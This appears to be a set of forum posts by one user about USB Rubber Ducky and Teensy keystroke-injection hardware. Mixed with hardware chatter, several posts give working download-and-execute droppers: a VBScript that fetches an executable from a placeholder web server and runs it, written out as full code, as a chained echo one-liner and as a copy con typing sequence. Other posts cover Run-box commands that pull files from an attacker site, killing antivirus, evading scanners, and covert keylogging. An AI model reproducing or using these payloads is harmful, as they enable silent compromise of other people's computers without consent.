Posts posted by AndrewFaulds
-
Well damn, I'm a noob. But can someone give me a design layout!
You need something like "Beginner's guide to embedded electronics"...
-
Okay, how would I get this on the Teensy?
Well, you get a proto board, solder it in, attach wires, connect them to teensy and program it to use it.
-
I've been playing around with what could be done from the Windows Run window and have the following sample that you guys might be able to build more from.
1. Open Run window (window-R)
2. Create a script file (VBScript for this sample) and execute it with the following command:
cmd /c "echo wscript.echo "hello" > c:\temp\test.vbs && start wscript c:\temp\test.vbs"
A couple of notes about the command:
a. cmd /c is used so that the command window will close on completion
b. I'm using echo to build a text file in some directory (make sure it's a directory that exists and you have rw rights to!)
c. If you want to build a script with multiple lines, you can just use another echo statement, but be sure to use >> instead of > to append to the script file you're building
d. && is used to separate the commands
e. I'm calling the start command instead of wscript directly so that the cmd process doesn't have to wait for the VBScript file to complete before closing the command window
Not a perfect solution, and certainly not a sophisticated payload in this sample, but I'm sure you guys are more creative than me.
Sergio
TOPTIP:
Use copy con to build scripts instead of echo:
copy con script.vbs
blah.blah
blah.blah.derp
blah[Ctrl+Z or F6]
-
That's a great idea. The Rockbox code base is incredibly clean and well organized making it very easy to hack. And you have the added bonus that an MP3 player looks completely innocuous when plugged into a computer. "Hey I need to charge my MP3 player, can I plug it in your USB port?"
And, disguised as a ducky, with a speaker soldered on, can play the rubber ducky song!
-
Correction: Nobody bothers to write viruses and by the nature of it being based off of UNIX, it has very few "hacks" because of things like stack protection that help to prevent buffer overflows, etc.
I know, I was joking.
The USB duck hack is very unreliable on the Mac due to the fact that very little in OS X is ever in exactly the same place computer to computer (e.g. dock at the bottom but can be resized and is centre aligned so things are never in the same place except on a clean install/user) and that you can't exactly use the menu bar to open apps; you can use Spotlight, but that returns different items depending on what the user uses regularly. I'm going to do my best to get around these issues and make the best payloads I can, but don't expect this to even work as well as it does on Windows.
Well, you can always use keyboard shortcuts. Although I doubt Mac OS X is very keyboard friendly.
-
I ordered 2 of Teensys too with a friend of mine, so could split the postage :)
That evil volcano ash seems to delay things though, dunno when it will arrive here...
Got few ideas ready, just need the hardware to test em out. Also trying to find a place where I can order PCB for that extremely small version I posted about. No luck yet, everyplace just seems to have minimum of 1000 to order :D
Those teensy tiny particles of silica from the volcano are stopping your Teensy.
-
I still like the VBS way of downloading more, 'cos of the less time it shows something on the screen.
But if you want to do it that way,
I recommend just doing it in the run box.
Like:
"c:\\Program Files\\Internet Explorer\\iexplore.exe" www.YOURSERVER/nox404/THEFILE.exe
That does the same, without showing the cmd at all ;)
Or, even better:
Open the run box, type iexplore http://attacksite.com
-
Yes, you can have multiple echos in one line.
It is separated by && and cmd recognises it as a new command.
I was thinking of this for the run box:
cmd.exe /c <command>, though the command was too long for the box.
When I order my ducky I will try both ways to see which one is faster to execute.
Still, copy con is more efficient.
-
It's quite a cheap endeavor, at least initially. It's when you're adding a bunch of sensors, memory card housings, TF cards, and rubber duckies that it starts to add on. And even then it's still a small price to pay for potential pwnage.
You also are forgetting the cost of Blue LEDs. They are essential.
-
Ah yes,
Thanks for bringing that up.
On that note do you know if that would effect the use of it as development?
And also would there be a way to change that?
(remove the Arduino from the board and load a library or something)
It makes it entirely useless.
That's how it "would effect the use of it as development".
As the serial converter chip, well, it appears as a serial COM port, and you need custom drivers for it.
If this was a MIDI Ducky, it'd be handy. But not for anything we want.
Perhaps the Arduino could do USB, with a custom USB port hooked up to the pins, but I somehow doubt if the Arduino's Serial IO mode is fast enough.
-
Removed, noob question already answered: http://www.hak5.org/forums/index.php?showtopic=16236
-
Then what about this?
When a VBS script is activated, the command prompt is immediately back. It doesn't wait for it to finish, so I think that the code from the first post won't work properly with bigger files.
So why not let the VBS execute the file? It's only 3 lines.
Dim DataBin
Dim HTTPGET
Set HTTPGET = CreateObject("Microsoft.XMLHTTP")
HTTPGET.Open "GET", "http://www.domain.com/file.exe", False
HTTPGET.Send
DataBin = HTTPGET.ResponseBody
Const adTypeBinary=1
Const adSaveCreateOverWrite=2
Dim test1
Set test1 = CreateObject("ADODB.Stream")
test1.Type = adTypeBinary
test1.Open
test1.Write DataBin
test1.SaveToFile "file.exe", adSaveCreateOverWrite
Set shell = CreateObject("WScript.Shell")
shell.Run Chr(34) & "file.exe" & Chr(34), 1, false
And also you can put all the echos in 1 string, so the waiting time is less than having to wait till the prompt comes back up again.
It will look something like this:
echo Dim DataBin>dl.vbs && echo Dim HTTPGET>>dl.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>dl.vbs && echo HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False>>dl.vbs && echo HTTPGET.Send>>dl.vbs && echo DataBin = HTTPGET.ResponseBody>>dl.vbs && echo Const adTypeBinary=1 >>dl.vbs && echo Const adSaveCreateOverWrite=2 >>dl.vbs && echo Dim test1>>dl.vbs && echo Set test1 = CreateObject("ADODB.Stream")>>dl.vbs && echo test1.Type = adTypeBinary>>dl.vbs && echo test1.Open>>dl.vbs && echo test1.Write DataBin>>dl.vbs && echo test1.SaveToFile "file.exe", adSaveCreateOverWrite>>dl.vbs && echo Set shell = CreateObject("WScript.Shell")>>dl.vbs && echo shell.Run Chr(34) ^& "file.exe" ^& Chr(34), 1, false>>dl.vbs
And then all that is left is to run it and exit CMD:
prompt> dl.vbs
prompt> exit
I think this is the lowest time possible being at the command prompt. Or someone needs to find a way to shrink the VB script even more! That would be awesome!
Since I didn't get selected for a dev kit, I am thinking of buying my own Teensy. Though a question: I read that Darren is using the original one, but I checked the site and all of their stuff uses mini USB. Any good/simple way for a converter (buy or self-making is OK)?
Cheers!
Uh....
You can't have multiple echo commands in a line.
And as I stated earlier, "echo something >dl.vbs" is less efficient than just copy con.
-
Something I'm hopefully going to test out is embedding the teensy inside an old white apple keyboard (Because it has huge amounts of space in the back for my crappy soldering.), taking out the USB controller board and running the buttons through the teensy for key logging or activating the payload when conditions are met.
So, Apple products don't get viruses?
It seems they get duckies.
-
Very nice work. Just tested it out by plugging in a random USB mouse. I did run into one small bug. When the program is running, plug in a new device, hit "ctrl+alt+del" then "esc" after the menu comes up. Then unplug the device. The letter "t" on the keyboard will no longer work. Tried it three times to make sure it wasn't me.
Other than that, great work. Will be running on my coloed server.
Oh those weird random-letter-no-longer-works bugs... I HATE THEM
-
4. Killing Anti-Virus by mouse click
This would be very simple after detecting antivirus in use. After the anti-virus is down, possibilities are endless.
It would be more efficient to do this using keyboard presses, as you can't guarantee window position.
Windows applications are HIGHLY keyboard accessible. Even the blind can browse animatedgifs.com!
-
Maybe something like this would work: have the duck load up cmd and type in...
echo Dim DataBin >dl.vbs
echo Dim HTTPGET >>dl.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>dl.vbs
echo HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False>>dl.vbs
echo HTTPGET.Send >>dl.vbs
echo DataBin = HTTPGET.ResponseBody >>dl.vbs
echo Const adTypeBinary=1 >>dl.vbs
echo Const adSaveCreateOverWrite=2 >>dl.vbs
echo Dim test1 >>dl.vbs
echo Set test1 = CreateObject("ADODB.Stream") >>dl.vbs
echo test1.Type = adTypeBinary >>dl.vbs
echo test1.Open >>dl.vbs
echo test1.Write DataBin >>dl.vbs
echo test1.SaveToFile "file.exe", adSaveCreateOverWrite >>dl.vbs
dl.vbs
file.exe
exit
This code will make a VB script that will execute and download a file from a web server. Then you run the file. There are a few antivirus products that detect this as bad, but with some changes it will run good.
I will be testing it here soon once my ducky gets here.
Tell me what you guys think?
Why the echo commands? copy con is more efficient ;)
Just do:
copy con dl.vbs[RETURN] Dim HTTPGET[RETURN] Set HTTPGET = CreateObject("Microsoft.XMLHTTP")[RETURN] HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False[RETURN] HTTPGET.Send[RETURN] DataBin = HTTPGET.ResponseBody[RETURN] Const adTypeBinary=1[RETURN] Const adSaveCreateOverWrite=2[RETURN] Dim test1[RETURN] Set test1 = CreateObject("ADODB.Stream")[RETURN] test1.Type = adTypeBinary[RETURN] test1.Open[RETURN] test1.Write DataBin[RETURN] test1.SaveToFile "file.exe", adSaveCreateOverWrite[CTRL+Z] file.exe[RETURN] exit[RETURN]
-
In regards of disconnecting the ducky, great idea, good that you thought of that!
I don't think copy con will work if the antivirus running (if not killed as discussed in another thread) has an instant scanning feature scanning contents of currently modified files..
Seb
Well, yes, but bear in mind most virus scanners won't know the exploit (assuming a new one), plus Ducky can create a different version every time with some crafty code.
-
USB hub with your ducky and a flashdrive maybe?
I'm looking for more 'creative' solutions, basically I'd like everything done as Keyboard input (if I have a choice :)
What I've just thought of would be using "copy con" to construct a script, e.g.
[WinKey+R] cmd [Enter] copy con quack.vbs[Enter] object = someobject[Enter] object.dosomething[Enter] end[CTRL+Z] quack.vbs[Enter]
Also one more idea: Make the ducky disconnect after delivering a payload, making it harder to detect.
-
In the USB Rubber Ducky Part 1 video, Darren says that you could potentially upload an executable payload from the HID.
How would you do this?
As even the smallest 10KB payload would take a long time to "type" into the PC, even automatically.
As mentioned elsewhere in this forum, with no delay, max speed would be around 500 chr/s. Now, uploading a binary via keystrokes would be slow, as binaries would have to be simulated as Alt+XXX key combinations to make it possible to enter the full range of 8-bit values. As a result, this 500 chr/s would become around 150 chr/s with no delay. At a rate of 150 bps, a 10KB (10240B) payload would take around 70 seconds to upload. That's way over a minute, and very inefficient.
Emulating a USB Flash Drive might work, but then the exploit could be blocked just as easily as the USB Switchblade.
Oh and Darren, if you're reading this: 1,1 is 1 pixel away from the very top-left corner of the screen. 0,0 would be correct.
-
Thanks!
So the Fonera+ IS in the Monkey Interceptor.
-
When will this happen?
I think the Fonera+ is much better than Fonera 2.0 for this, as it's far more portable.
Also, the la Fonera+ has 2 ethernet ports, which could be very useful...
Or is the la Fonera+ inside the yellow monkey thing?
As it has wifi and two ethernets...
hmm....
[Version 1] Uploading Executables?
in Classic USB Rubber Ducky
Posted
Then you're a script-kiddie and not a hacker?!